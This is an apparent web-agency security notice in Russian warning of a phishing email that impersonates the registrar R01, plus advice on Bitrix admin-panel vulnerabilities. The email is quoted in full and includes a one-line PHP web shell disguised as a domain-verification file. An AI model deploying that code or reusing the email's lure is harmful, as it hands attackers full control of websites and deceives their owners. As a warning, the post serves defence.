Срочно о безопасности Битрикса

Срочно о безопасности Битрикса 18.01.2017

Срочно о безопасности Битрикса

На хабре появилась статья об уязвимостях Битрикса. Дополнительно, на днях обратился клиент с вопросом по безопасности, не относящийся напрямую к этой системе управления.

 Итак, начнем со второго вопроса. Клиент сообщил, что ему пришло письмо якобы от регистратора доменов R01 с требованием подтвердить право владения доменом путем размещения в корневой папки "подтверждающего" файла php из одной строчки.

На всякий случай приведу письмо полностью:
"Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом -------.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a12cyvdbowwjrhg4.php со следующим содержимым:

<?php
    assert(stripslashes($_REQUEST[R01]));
?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 января 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено."

Письмо написано профессионально: персональное обращение, обратный адрес, оформление, термины, ограничение времени, угроза. Поэтому, есть большая вероятность, что часть пользователей поверят и загрузят этот файл. Что произойдет дальше? Злоумышленник может получить ПОЛНЫЙ доступ к вашему сайту, скопировать, изменить или удалить информацию. 

Будьте осторожны, не предпринимайте никаких действий без консультаций со специалистами!

Первый вопрос - обнаружение множественных уязвимостей в административном разделе. Уязвимости могут сработать, если Администратор открывает ссылки, присланные злоумышленниками. Рекомендации наши и Битрикса:
  1. уведомить о проблеме всех сотрудников, которые работают с сайтом, особенно - Администраторов
  2. обновить модули Битрикса до последней версии
  3. произвести проверку встроенным сканером уязвимостей 
Дополнительно, полностью закрывают эти проблемы встроенные средства Битрикса, такие как возможность работы с Административным разделом только с определенных IP адресов.

Систему мы рекомендуем обновить в любом случае, сняв предварительно резервную копию. Особое внимание нужно уделить обновлению следующих модулей:

  • Главный модуль, v16.5.6, 2016–09–20
  • Управление структурой, v16.5.5, 2016–09–20
  • Валюты, v16.5.1, 2017–01–16

  • Всем безопасной работы!

    Возврат к списку